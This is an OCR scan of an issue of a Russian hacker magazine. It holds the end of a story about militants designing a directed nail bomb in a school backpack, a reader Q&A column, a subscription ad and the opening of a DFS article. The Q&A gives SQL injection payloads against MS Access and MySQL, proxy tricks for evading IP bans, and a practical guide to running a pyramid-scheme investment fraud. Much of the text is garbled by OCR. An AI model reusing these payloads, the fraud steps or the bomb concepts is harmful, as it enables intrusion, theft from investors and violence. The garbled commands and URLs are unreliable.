— Что поискать? — не понял Умар. 

— Форм-фактор, — повторил Джон. — Не понимаешь, каков аналог этого 
английского термина? Скажемтак, вместилище. Помнишь, в семидесятых 
годах в московском метро рвануло?Там бомба была уложена вутятницу... 

— Куда? — Умар уже начинал дергаться. — Не говорите загадками, я не знаю 
ваш язык настолько, чтобы понимать все, что вы произносите. Вас ведь тоже 
раздражает, когда в вашем присутствии мы говорим на родном языке... 

Джон усмехнулся: 

— Если я правильно посчитал, в лагере боевики восьми национально- 
стей... Или девяти, если учитывать то го финна, который то прилетает на вер- 
толете, то улетает с ним обратно. И в любой момент времени кто-то в этом 
лагере разговаривает на своем языке... Утятница — это чугунная кастрюля с 
крышкой для приготовления птицы. Так понятно? Взрыв порождает множе- 
ство осколков, что в закрытом помещении приводит ктотальному пораже- 
ниюлюдей.Тотвзрывунес несколько десятков жизней в вагоне метро. 

— Я не хочу повторяться, — упрямо сказал Умар. — Я хочу рюкзак. И причем 
здесь метро? 

— Просто как вариант, — щелкнул пальцами Джон. — Это может быть 
вокзал, аэропорт, супермаркет, автобусная остановка, самолет, корабль... 
Список бесконечен. Хорошо, пусть будет рюкзак. Значит, взрывчатка долж- 
на бытьлибо очень мощной, либо накачанной под завязку уже готовыми 
осколками: гвоздями, болтами, шариками из подшипников... 

— Вы неплохо разбираетесь в этом, для компьютерщика, — подозрительно 
сказал Умар. — Хотя ничего нового для меня вы не сказали. Так в чем вы 
можете мне помочь? 



— В расчете направленного взрыва, например, — Джон вернулся на преж- 
нее место на дереве. — В поиске оптимального места для минирования. 

— Зачем? 

— В этом нет никакого секрета. Я думаю, что смогу на этом заработать. И 
приобрету дополнительный опыт— пригодится в очередном лагере. Судя 
по затяжному характеру войны, я еще долго буду при деле. 

Умар молчал, обдумывая услышанное. В целом предложение было за- 
манчивым. Рюкзак действительно имел один существенный минус. Он 
сам по себе был хорошей маскировкой, но отлюбой части взрывного 
устройства требуется максимальная эффективность, а осколков от 
куска материи не получишь, как ни крути. Значит, надо планировать 
точно — и место, и направление, и вес, и предполагаемое количество 
жертв. Если компьютер Джона умеет рассчитывать все эти факторы, 
то стоило взять его в помощники. Но что-то во всем этом Умару не 
нравилось... 

— Когда вы делили нас на умных и дураков, я попал в разряд последних, 

— напомнил он Джону. — Что же изменилось стех пор? 

— Человек, способный придумать бомбу в школьном рюкзаке, не может 
быть дураком, — Джон сказал это, глядя в глаза Умару. — Я спрашиваю 
последний раз: тебе нужна помощь? 

Умар глубоко вздохнул и согласился. 

Следующие несколько дней они провели вместе: Джон добился того, чтобы 
боевикстал посещать его занятия, аУмар получил себе в помощники вы- 
числительную мощь ноутбука. 

Честно говоря, бомба удалась. Умар чувствовал, что его устройство тоже 
попадет в инструкции Центра. Взорвать ее удастся один раз, максимум два, 
но вот напугать детей и их родителей получится на очень большой срок. 
Будут шарахаться от портфелей, сумок, рюкзаков. Великое дело — страх и 
его родственник — паника. 

Одну бомбуони с Джоном испытали в лесу за пару недельдо выхода группы 
из леса. Взрыв — направленный, рассчитанный на компьютере — снес 
несколько деревьев втом самом секторе, который и был выверен при 
помощи инженерной программы. Умар подошел к еще дымящейся воронке, 
осмотрел аккуратный вывал леса и, оглянувшись на Джона, показал боль- 
шой палец. На следующий день он помолясь приступил ксборке боевого 
образца... 

Группа ушла поздно ночью. Джон не вышел их проводить. Он спал, и ему 
снилась Калифорния, жена, дети... 

Из сводки новостей: 

«Вчера вечером 31 августа 200* года в одном из кварталов прибрежного го- 
рода N совершентеррористический акт. В автомобиле, припаркованном на 
набережной, было приведено в действие взрывноеустройство мощностью 
до трехсот граммов втротиловом эквиваленте. По счастливой случайности 
никто не пострадал, за исключением водителя автомобиля и пассажира, 
которые погибли на месте оттяжелых минно-взрывныхтравм...» 

Из отчета опергруппы ФСБ по факту взрыва: 

«Предположительно, бомба находилась в школьном рюкзаке, остатки 
которого найдены в сгоревшей машине и рядом с ней. Наши эксперты 
с высокой долей вероятности смогли установить, что в момент взрыва 
рюкзак находился на спине шахида и основной удар пришелся ему в 
спину. Таким образом, его тело приняло на себя примерно килограмм 
различных металлических искусственных поражающих факторов в 
виде гвоздей и металлических шариков... Предполагается, что взрыв 
был преждевременным, поскольку вся его маскировка рассчитана на 
приведение бомбы в действие первого сентября в одной из ближай- 
ших школ...» 

Джон присел на дерево, на котором они вместе сУмаром приняли решение 
собирать бомбу, вспомнил вчерашнюю шифровку о взрыве на набережной, 
потом оглянулся по сторонам и сказал — шепотом, по-русски: 

— Первое сентября... Дети в школу пошли... Живые... 

За спиной в лесу грохнула автоматная очередь и раздался властный крик на 
арабском. Джон покачал головой, стер с лица улыбку, сжал зубы и пошел в 
лагерь. Работать дальше, пс 
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О: Как запустить эксплойт с рас- 
ширением ру? Что это вообще за 
зверь? 

А: Зто сплоит, написанный на 
РуіЬоп'е. Запускается он аналогично 
эксплойтам, написанным на РегГе, 
РНР. Скачать интерпретатор можно 
отсюда : ЬіірѴ/рѵЕЬоп.ога/'боѵѵпІ.оасІ . 

О: Стал использовать утилиту для 
поиска ошибок/уязвимостей в 
исходниках, но десятки строчек, 
которые мне выдает програм- 
ма и в которых якобы имеются 
уязвимости, нереально проверить 
самому. Как правило, в большей 
части выданных строк ошибок нет 
вообще. Как быть? 

А: Для анализа сорцов я сам пользуюсь 
утилитой под названием РАТ5 — НоидЬ 
АибібпдТооІіогЗесигіІу. В геасітеясно 
сказано, что пользователь (посредст- 
вом ключа ’-ѵѵ') можету казать ѵѵагпіпд- 
левел (1 -3),то есть чувствительность 
утилиты кразличнымуязвимостям: 

1 —уровень по дефолту, самый 
высокий; 

2 — средний; 

3 — низкий уровень. 

К примеру, пишем в командной 
строке: 



габз.ехе зсгірД.рІір -ѵ? 3 

Таким образом, мы указываем 
программе, что нужно выводить пре- 
дупреждения об ошибках, имеющих 
низкий уровень опасности. 

0: Есть желание устраивать торги 
на еВау'е, но люди говорят, что по- 
требуются «фиды». Что это такое? 

А: РеебЬаск (он же фид) — это отзыв 
селлеров (продавцов)/баеров 
(покупателей] о еВау-аккаунте. Имея 
большое количество отзывов, ты 
имеешь больше шансов продать 
свойтовар на аукционе. 

0: На определенном сайте, где 
запрещена регистрация более 
чем с одного ІР-адреса, мои акки 
постоянно банят, но ведь я при 
этом использую прокси. Как такое 
может быть? 

А: Не все прокси одинаково полезны 
:). Возможно, ты вообще заюзал 
прозрачные прокси-серверы. 
Вспомним основные переменные 
окружения, которые мы передаем 
конечному серверу: 
НТТР_ІІ5ЕН_АеЕМТ- применяе- 
мый клиентом браузер и его версия 



(М5ІЕ 6.0, кпримеру); 
НПР_АССЕРТ_1_АЫ611А6Е - язык, 
используемый браузером; 
НТТР_Н05Т— название сервера; 
РЕМ0ТЕ_А00Р — ІР-адрес пользо- 
вателя; 

НТТР_ѴІА — если значение есть, 
следовательно, используется 
проксик. Это значение — адрес (или 
несколько адресов) прокси-сервера. 
НТТР_Х_Р0 РѴѴАР Э Е0_Р0 Р - если 
эта переменная не пустая, значит 
используется прокси. Значение 
— реальный адрес юзера (ІР). 
Таквотпри использовании прозрач- 
ного прокси переменные окружения 
приобретаюттакой вид: 

КЕМОТЕ_АВВЯ = ІР прокси 
НТТР_ѴІА = ІР прокси 
НТТР_Х_ЕОШАКВЕВ_РОК = 
твой реальный ІР 

Какая-либо анонимность притаком 
раскладе отсутствует напрочь. 
Можетбыть, на сервере в принципе 
запрещено использовать прокси, 
и поэтому банятся абсолютно все 
пользователи, юзающиетаковые. 
Как и прозрачные, анонимные 
прокси не скрывают фактсвоего 



применения. При их использовании 
также заданы переменные окруже- 
ния, которые их выдают (НТТР_ѴІА, 
НТТР_Х_Р0РѴѴАП0ЕП_Р0Н]: 

КЕМОТЕ_АВВК = ІР прокси 
НТТР_ѴІА = ІР прокси 
НТТР_Х_РОШАКВЕВ_РОК = ІР 
прокси 

Самыми надежными и по-настояще- 
муанонимными являются элитные 
прокси-серверы, которые не выдают 
ни реальный ІР-адрес клиента, ни 
факт самого использования прокси. 
Заголовок становится таким: 

НЕМОТЕ _АВВК = ІР прокси 
НТТР_ѴІА = не определена 
НТТР_Х_РОШАКВЕВ_Р(Ж = не 
определена 

Но кроме проверки переменных 
окружения есть другие методы 
пробива реального ІР-адреса юзера 
или факта использования прокси. 
Соокіез, например. Представь такую 
ситуацию: ты впервые заходишь на 
сайтбез всяких прокси, и сервер 
записываеттвой реальный ІРтебе 
же в кукисы. В следующий раз ты 
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уже заходишь на сайт, накрывшись 
проксиком, а сервер проверяет 
ранее созданные куки сзаписан- 
ным ІР и сравниваетего стекущим 
значением. ІР-адреса, естественно, 
не совпадают, и ты идешь в БАНю 
:). Поэтому следует л ибо чистить со- 
зданные соокіез’ы, либо запретить 
их вообще. Также очень рекомендую 
отключить в браузере Чаѵа и АсбѵеХ. 

0: Еще я слышал про некие 
искажающие прокси? Как они 
работают? 

А: Это те же самые анонимные 
прокси, только реальный ІР клиента 
скрывается от конечного сервера: 

Е.ЕМОТЕ_АВБЕ. = ІР прокси 

НТТР_ѴІА = ір прокси 

НттР_Х_РОРИАРБЕВ_ЕОР = 
случайный ІР 

Но, надо сказать, встречаются такие 
прокси довольно редко. 

0: Как запретить чтение файлов в 
Му5СІІ_? 

А: Открываем файл/еіс/ту.спіи 
в разделе [тузцісі] пишем такую 
строку: 

зеЬ-ѵагіаЫе=1оса1- 

іп:Еі1е=0 

0: Как определить, что при 5СИ- 
іщесііоп я работаю с М5 Ассезз? 

А: В ответе сервера будет 
либо примернотакая строка: 
«[МісгозоіШСЮВС МісгозоЙ Ассезз 
Огіѵег]», л ибо такая: «Зупіах еггог іп 
зігіпд іп циегу ехргеззіоп ...». 

0: А как, собственно, выдирать из 
М5 Ассезз названия таблиц? 

А: Рассмотрим конкретный пример. 
Названия всех таблиц хранятся в 
системной таблице МЗузОЬіесІз: 

ЪЬЪр: //багде1:/?петл73І1:еш=- 
1+ипіоп+зеІесб+паше ,2,3,4 
, 5 , 6+^гот+М5узОЪзесЪз+ѵЛіе 
ге+МЗузОЪд есбз . Туре=5 

На запрос получаю ответсервера: 
«Ошибка РесогсКз] саппо! Ье геаб; по 
геасі регтіззіоп оп ‘МЗузОЬіесІз’ на 
тэге ЫЕѴѴ8ІТЕМ». И это нормально 
— по умолчанию доступ ксистемным 
таблицам закрыт. 



Представим, что нам удалось получить 
доступ ктаблице МЗузОЬіесІз. Тогда 
для вытаскивания остальных та блиц 
следует использовать оператор ТОР: 

ЪЪЪр: //ЬагдеЬ/?пеѵ73ІЬеш=- 
І+ипіоп+зеІесЬ+Ъор+І+зЬаг 
С+аЬ+2+паше ,2,3, 4+Тгош+МЗ 
узОЬз есбз+ѵ/Ііеге+МЗузОЬз 
есЬз.Туре=б 

Про остальныетриксы в Мз Ассезз 
читай в М5 Ассезз 5СН_ Іщесбоп 
СЬеаіЗЬееІ (ѵѵѵѵѵѵ.ѵѵеЬаррІезІ.ога/ 
тз-ассезз-здІ-іпіесбоп-сЬеаІ:- 
збееІ-ЕЫ-ЫтІ. ). 

0: Как быть, если 50І_-іпіесіоп 
находится в I Ы5ЕРТ -запросе СУБД 
М550І.? 

А: Предположим уязвимый сцена- 
рий выполняеттакой запрос: 

іпзегѣ іпЬо агѣісіез 
ѵаіиез ($ісІ, 'шеззаде'); 

Тогда мы внедряем свой запрос и 
с помощью оператора коммента- 
рия («#»), отсекаем последующий 
запрос: 

іпзегС іпі:о агъісіез 
ѵа1иез(123, (зеіесб 
соіішппз Тгош ЬаЫе ѵЛіеге 
ісі=1))#, 'шеззаде'); 

О: Есть подозрения, что мой 
сервер взломали и протроянили 
некоторые файлы. Как это опре- 
делить? 

А: В предыдущем РАСГе мы уже 
писали, что взломщик легко может 
указать собственную дату послед- 
него изменения файлов, поэтому 
следует проверить контрольные 
суммы возможно протрояненных 
файлов. Само собой, у тебя должны 
быть заранее записаны чексум- 
мы «чистых» файлов (команда 
тсібзит /сііг/* >> /Иоте/изег/біе; 
біе — название файла, в который 
мы записываем все чексум- 
мы файлов, расположенных в 
директории /біг/). Для сравнения 
текущих чексумм с ранее записан- 
ными выполним команду тсібзит 
-с/боте/изег/біе. Если после 
этого появится список файлов и 
напротив каждого из них будет 
красоваться надпись «Зиссезз», то 



изменений произведено не было. 
Если появится ошибка — время 
бить тревогу. 

О: Реально ли подзаработать на 
НУІР-проектах? Что для этого 
нужно? 

А: Если это было бы нереально, то на 
веб-форумах не было бы десятков 
сообщений с предложением вложить 
свои деньги в высокодоходный 
проект и стать миллионером :). Для 
непосвященных в реалии грязного 
сетевого бизнеса скажу, что НУІР 
— это, грубо говоря, финансовая 
пирамида. Основатель хайпа вы- 
плачиваетлаве нескольким первым 
десяткам (или единицам, здесь все 
зависит от масштабности пирамиды) 
человекза счет вкладов множества 
других буратин, после чего весь про- 
ект пропадает. Ну а бизнес этот дол- 
гий и трудоемкий. Один раз вложить 
большие деньги и потом втечение 
нескольких лет пожинать плоды 
здесь не удастся. А вот, собственно, 
что будет нужно: дешевый хостинг, 
домен(ы), лаве для мониторов, 
движокдля всего проекта. Вклады- 
вать деньги в дешевый хостинг мы 
будем потому, что его придется часто 
менять, также как и домены. Кстати 
говоря, далеко не один хостинг 
предоставляеттестовый бесплатный 
период использования на 2-5 недель. 
Конечно, этого маловато для одного 
хайпа, но для начала сойдет. 
Несколько движков для НѴІР-про- 
ектов есть в свободном доступе в 
Сети, но я настоятельно советую 
написать/заказать свой, так как в 
любом случае код паблик-движков 
придется модифицировать. 

Теперьо мониторах (мониторингах). 
Они нужны для раскручивания хайпа, 
привлечения первых клиентов. Ты 
проходишь своего рода проверку: 
монитор делает вклад твоими же де- 
ньгами и, получив обещанную тобою 
же выплату, дает статус честного, ре- 
ально выплачивающего хайпа. Чем в 
большем количестве мониторингов 
ты выплачиваешь, тем больше ктебе 
доверие у потенциальных участни- 
ков. Парочка таких мониторов: 

ЫЩр : / / іпѵезЪйасісІу . сот 

ѴДЛ7Ѵ7 . Ьуір-паѵідаЪог . сот 

Далее нужно задействовать 



традиционную рекламу: спам 
по мылам/аськам, рекламу на 
форумах. Форумы нужно выбирать 
специализированные (а не что-то 
вроде форума на хакег.ш, где целая 
толпа хацкеров полезетломатьтвой 
чудо-проект :)). Рекламное сооб- 
щение, думаю, ты и сам прекрасно 
сочинишь. Но и здесь не обходится 
без обмана. Мой знакомый, который 
работает НУІР-бизнесе, рассказал, 
что после регистрации на борде он 
делает рассылку личных сообщений 
уважаемым юзерам с порядочным 
количеством постов (от 1 500) с пред- 
ложением поучаствовать в своем 
проекте или оставить положитель- 
ный отзыв в созданной рекламной 
теме о проекте за энную сумму 
денег. Зачастую такое предложение 
принимают админы и оставляют 
сообщение вроде «Проверено "На- 
зван и е_это го_круто го_фо ру м а " ». 
Также с начала проекта следует 
ввести систему рефералов. Как 
правило, именно рефы являются 
самойуспешной рекламой. По идее, 
юзеры сами будут выполнять работу 
по распространению рекламы. 
Проект отработал, ты получил свою 
сотню бачей, повесил на индексной 
странице сообщение, что пирамидка 
закрывается в связи с приближе- 
нием к Земле метеорита и... стал 
переделывать дизайн для нового 
хайпа :). Естественно, я описал толь- 
ко самые основные моменты, все 
подробности невозможно привести 
в одном РАСГе. Поэтому работай, 
совершенствую свои навыки... но 
только на локалхосте! :) 

0: Произошел какой-то сбой в 
моем ПАЮ 0 зігіре массиве. Как 
теперь быть? Как-нибудь можно 
восстановить данные? 

А: БАЮ 0 зігіре — это очень мощная 
штука, способная феноменально 
увеличить производительность фай- 
ловой системы. Но, ксожалению, це- 
ной надежности хранения данных. 
Если полетел хотя бы один винт в 
массиве, можно считать, что поле- 
тели сразу все данные. Впрочем, это 
самый худший вариант. Предпо- 
ложим, что ничего подобного у нас 
не случилось, а просто произошла 
какая-то ошибка и теперь необходи- 
мо восстановить данные. Действуем 
по следующему алгоритму: 
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1 . Подключаем жесткие диски к 
системе (в обход НАЮ-контроллера, 
разумеется) и загружаемся с 1_іѵеС0 
на базе ѴѴіпсІоѵѵз, который предва- 
рительно можно создать с помощью 
программы ВагіРЕ [\л/ѵѵѵѵ.пи2.пи/ 
реЬиіШег ). 

2. Первым инструментом, который 
нам понадобится, будет про грамма 
РАЮ гесопзігисіог ( ѵѵѵѵѵѵ.гипііте. 
ога/гаісІ.Ыт ). предназначенная для 
работы с РАЮ5 и РАЮО. Функци- 
онируетона следующим образом: 
проходя посекторно жесткие диски, 
утилита путем подбора анализирует 
размер блока рейда и после этого 
создаетобраз массива. Можнотут 
же скопировать его на носитель 
или же создать файл-контейнер. Я 
рекомендую второй вариант. 

3. Когда через некоторое время, 
подчас довольно продолжитель- 
ное, образ массива будет создан, в 
ход пойдетдругая замечательная 
утилита оттого же разработчика 

— ОеШаІаВаскіог ЫТРВ ( ѵѵѵѵѵѵ. 
гипІіте.ога/асІЬ.Ьіт ). Она быстро от- 
кроет файл-образ, проанализирует 
его и, если повезет, выдаст внуши- 
тельный списокфайлов, которые 
сможет восстановить. Причем в этот 
списоктакже будут входить давно 
удаленные документы. Их можно 
отфильтровать, установив соответс- 
твующую галочку. 

0: В одном из подкастов подслу- 
шал идею авторизации с помощью 
телефона, а именно встроенного 
модуля ВІиеіооіН. Вы глядит это 
примерно так: кактолько мы 
подходим с телефоном в радиус 
действия Віиеіооііі-донга, встав- 
ленного в 115В, компьютер тут же 
разблокируется и осуществляется 
вход в систему. А если мы выходим 
за этот радиус, компьютер сразу 
же лочится. Как это можно реали- 
зовать? 

А: Все уже давно сделали за нас. 

Вот отличный продукт — І_оскІІІ\Іоѵѵ! 
( ѵѵѵѵѵѵ.ЬІиеІооіЬзЬагеѵѵаге.сот ). 
который предоставляет в точности 
описанную тобой возможность. От 
себя скажу, что штука эта поистине 
впечатляющая и ей реально можно 
уди вить друзей и подруг. 

0: Посоветуй хороший бесплатный 
етаіі-сервис с поддержкой ІМАР. 

А: Если еще месяц назадя бы 
задумался над твоей просьбой, то 



теперь, что тебе посоветовать, знаю 
наверняка: дтаіі.сот. С недавнего 
времени етаіі-сервис отбоодіе 
предлагает всем пользователям 
использовать современный про- 
токол для приема/передачи почты. 
Для этого в почтовой программе 
достаточно указать сервер: ітар. 
дтаі1.сот:993 и включить 55І_. На- 
помню, что протокол ІМАР позволяет 
сохранять всю почту на сервере и 
синхронизировать ее (втом числе 
состояние прочитанных и непрочи- 
танных писем) даже втом случае, 
если ты работаешь на разных ком- 
пьютерах и клиентах. Короче говоря, 
прощай РОР — добро пожаловать, 
современный ІМАР! 

0: Как на старте системы подклю- 
чить все нужные сетевые диски? 

А: Самое правильное — сделать это 
с помощью следующего ѴВ- с крипта: 

ЗеС оЪзЫеСтлгогк = 

СгеаСеОЬд есС ( "МЗсгірС . 
^Ъѵгогк" ) 

Зек оБгіѵез=оЪзЫеСѵгогк. 
ЕпитЫебѵгогкБгіѵез 
ту сігѵ = " II : " 
тарресі = баізе 
тузкаге = "\\мд\пс1" 

Рог і = 0 Со оБгіѵез .СоипС 
- 1 ЗСер 2 

' МЗсгірС . Еско "Бгіѵе " & 
оБгіѵез . ІСет ( і ) & " = " & 
оБгіѵез . ІСет ( і+1 ) 

11 оБгіѵез . 

ІСет ( і ) =тус1гѵ ТЪ.еп тарресі 

= Сгие 

ЫехС 

'МЗсгірС . есТю "тарресі = " 

& тарресі 
ІТ ЫоС тарресі 
ТЪ.еп оЬзЫебѵгогк. 
МарЫеСѵѵогкБгіѵе тусігѵ, 
тузкаге 

О: В настройках прокси есть такая 
галка — «Искать параметры 
прокси автоматически». Как это 
работает? 

А: Автоматический поиск пара- 
метров прокси-сервера, который 
реализован практически во всех 
современных браузерах, основан на 
протоколеѴѴРАО (ѴѴеЬ РгохуАиІо- 
йІБСоѵегу Ргоіосоі). Его задача за- 
ключается в обнаружении скрипта с 
настройками сервера, написанными 
на языке іаѵаЭсгірІ, который называ- 
ется РАС (Ргоху Аиіо Сопіід). Для это- 



го браузер использует 0Ы5, йНСР и 
Эегѵісе І_осаІіоп Ргоіосоі (5ЮР). ѴѴРАО 
позволяет клиентам автоматически 
определять настройки ргоху-сервера 
без участия пользователя. Если у 
тебя включена настройка «Автома- 
тическое определение настроек», 
то при подключении к интернету 
браузер попытается найти сервер 
ѵѵрасІ.<имя-вашего-домена>. В 
случае неудачи браузер будет добав- 
лять ѵѵрасі ко всем именам доменов 
уровнем выше (вплоть до третьего 
уровня). Если один из серверов все- 
таки найдется, то браузер в корневом 
каталоге попытается обнаружить 
файл ѵѵрасі. сіаі и в случаеуспеха 
будет использовать его какскриптс 
параметрами прокси-сервера. 

0: Как настроить ѴІРАО в своей 
локальной сети? 

А: 1 .Сначала нужно создать 
РАС-файл с настройками прокси. 
Подробности и примертакого 
конфига можно найти в Википедии: 
Ыір://еп.ѵѵікіресІіа.ога/ѵѵікі/Ргохѵ 
аиіо-сопііа . 

2. Сохраняем этот файл в корневом 
каталоге нашего ѵѵеЬ-сервера (из 
домена) под именем ѵѵрасі. сіаі и 
убеждаемся, что он доступен по 
адресу ЬіІр://ѵѵѵѵѵѵ.<имя-вашего-до- 
мена>/ѵѵрасІ.сІаІ . При необходимости 
можно использовать НТТР-редирект. 

3. Добавляем строку «арріісаііоп/х- 
пз-ргоху-аиіосопіід сіаі» в файл 
тіте.іурез в настройках нашего 
веб-сервера и перегружаем сервис. 

4. Далее создаем запись ВЫ5, 
которая позволит распознавать имя 
ѵѵрасі. <имя-вашего-домена> в ІР- 
адресе ѵѵеЬ-сервера. 

5. В браузере выбираем пункт ІІзе 
Аиіотаііс Сопіідигаііоп Бсгірі («Ис- 
пользовать сценарий автоматичес- 
кой настройки»), прописываем там 
адрес, по которому находится наш 
файл ѵѵрасі. сіаі (например. Ыір:// 
ѵѵрасі.ѵоиг.сіотаіп.пате/ѵѵрасі.сіаі ) и 
смотрим, как работает скрипт. 

6. Если все нормально, включаем 
автообнаружение, выставив значок 
напротив «Искать параметры 
прокси автоматически». Все должно 
работать. 

О: Как на практике реализовать 
проброс портов через 55Н? 

А: Допустим, в локальной сети есть 
терминал с ІР-адресом 192.168.0.2, 
к которому нет доступа извне. 
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В этой же сети функционирует 
маршрутизатор с внутренним ІР 

192.168.0. 1 и внешним адресом 
85.86.87.88. Как подключиться к 
терминалу? А воттак: 

$ззЪ. -Ь 

3389:192.168.0.2:3389 

85.86.87.88 

После аутентификации появит- 
ся обычное, на первый взгляд, 
соединение по 55Н, однако вместе 
с ним будет проброшен порт на 

192.1 68.0. 1 0:3389 (напомню, 3389 
— это гсір-порт). Теперь мы можем 
сделать воттак: 

гсіезкДор -аіб -д1024х768 

127.0.0.1:3389 

Да-да, мы коннектимся к себе же на 

127.0. 0.1 :3389. Но подключаемся при 
этом к терминалу 192.168.0.10! 

0: Как наладить совместную 
работу над проектом и контроль 
версий. Пишу большую часть 
кода прямо в блокноте и никаких 
изысканных средств использо- 
вать не могу! 

А: Проще всего воспользоваться 
СѴ5-сервером. В качестве клиента 
можно заюзать очень простую 
программу — Тогіоізе СѴ5 ( ѵѵѵѵѵѵ. 
Іогіоізесѵз.огд ). которая удобно 
встраивается в ѴѴіпсІоѵѵз Ехріогег 
в качестве плагина. Нашей целью 
будет создание сайта в качестве 
модуля в репозитарии СѴ5. Для 
этого обращаемся через проводник 
к папке с сайтом, кликаем по ней 
правой кнопкой, в меню выбираем 
«СѴ5 Маке пеѵѵ тосіиіе». Далее 
задаем необходимые парамет- 
ры соединения с сервером. Все. 
Теперь пару слов о команде соттіі. 
Она не только фиксирует файлы, 
но и изменяетномера версийу 
отредактированных файлов. Это 
дает возможность по команде сШ 
построить диаграмму изменений и в 
случае чего откатиться до опреде- 
ленной версии файла, например до 
последней рабочей. Необходимо 
также помнить, что каждую правку 
кода необходимо сопровождать 
командами асИ, сопіепі и соттіі. В 
противном случае мы рискуем полу- 
чить несинхронизированную копию 
где-нибудь втом месте, из которого 
мы работаем. Е-Е 
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Официальный спонсор категории Сатіпд мониторы Затзипд 



Официальный спонсор категории Тренды ОреІ Согза. 



Официальный спонсор категории Мотор автомобильная электроника Рапазопіс 
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ПОДПИСКА В РЕДАКЦИИ 

С 1 ноября по 31 января проводится 
специальная акция для читателей журнала 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 



1980 руб. 

цены действительны до 31 января 2008 года 



(на 1 5% дешевле чем 
при покупке в розницу) 
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ПЛЮС ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 

ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО 
ЖУРНАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ. 

• МАРТОВСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ 




«ГГ спец» 





Махі Іипіпд 






ОМВОАРй Тоіаі РооіЬаІІ «Хулиган» 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА, ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР. 



Теперь ты можешь получать журнал с КУРЬЕРОМ не только в Москве, но и в Санкт-Петербурге, Уфе, 
РІижнем РІовгороде, Волгограде, Казани, Перми, Челябинске, Омске. 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 



При подписке на комплект журналов 
ЖЕЛЕЗО ВУВ + ХАКЕР ВУВ + ІТ СПЕЦ Сй: 

- Один номер всего за 147 рублей 
(на 25% дешевле, чем в розницу) 

- плюс бесплатная подписка на любой журнал 
(дате)Іапб на 1 месяц! 





ЗА 12 МЕСЯЦЕВ 













ВЫГОДА • ГАРАНТИЯ • СЕРВИС 



КАК ОФОРМИТЬ ЗАКАЗ ВНИМАНИЕ! 



1 . Разборчиво заполните подписной купон и квитанцию, выре- 
зав их из журнала, сделав ксерокопию или распечатав с 
сайта шѵѵ.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купо- 
на и квитанции —любым из нижеперечисленных способов: 

• по электронной почте зиЬ5СгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных доку- 
ментов в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подпис 
ных документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в пос- 
леднем случае предварительно отсканировав или сфотографиро- 
вав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 






Подписка на журнал «ХАКЕР+йѴР» на 6 месяцев стоит 1080 руб. Подарочные журналы при этом не высылаются 



По всем вопоосам 



связанным с подпиской, звоните по бесплатным телефюнам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпІо@дІс.ги или прояснить на сайте шш.СІ-С.ги 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «ХАКЕР» 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 

НА ЖУРНАЛ « : 

□ на 6 месяцев 

□ на 1 2 месяцев 

начиная с 200 г. 

і— I | Доставлять журнал по почте 
— на домашний адрес 
Доставлять журнал курьером : 

I I на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



прошу выслать бесплатный номер журнала 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 
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Страж 

ФАЙЛОВОГО ДЕРЕВА 

РАЗВЕРТЫВАЕМ РАСПРЕДЕЛЕННУЮ ФАЙЛОВУЮ СИСТЕМУ 0Р5 

Сегодня уже трудно кого-либо удивить разветвленными сетями со сложной топологией, наличием уда- 
ленных и мобильных офисов. Для администратора организация любого сервиса в таких условиях — дело 
непростое. Но не нужно забывать и о наших пользователях — им в этом случае придется работать с боль- 
шим количеством разрозненных устройств и ресурсов, находящихся на различных компьютерах и серве- 
рах сети. Соответственно, поиск необходимой информации может быть крайне затруднен. Распределенная 
файловая система БРЗ позволяет решить эту проблему. Давай посмотрим, как именно. 

НАЗНАЧЕНИЕ И ВОЗМОЖНОСТИ 0Р5 пространство имен. Пользователь, вместо того чтобы запоминать имена 

Распределенная файловая система ЭРЗ (ОізИгіЪшесІ Рііе ЗузИет) как всех общих сетевых ресурсов (Шіѵегзаі Иатт^ Сопѵепгіоп, ІЖС) , вроде 

стандартный компонент появилась еще в ѴѴіп2к. Ее задача — облегчить \\5егѵег\РоЫег, будет обращаться к единому пространству ТЖС-имен, 
управление, доступ и поиск данных в сети. Для этого файловые ресурсы, в котором объединены все серверы и общие ресурсы сети. А на каком 
находящиеся на разных компьютерах, объединяются в единое логическое конкретно компьютере находится запрашиваемый файл, уже забота 
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БЕЗ, пользователю не нужно беспокоиться о реальном расположении 
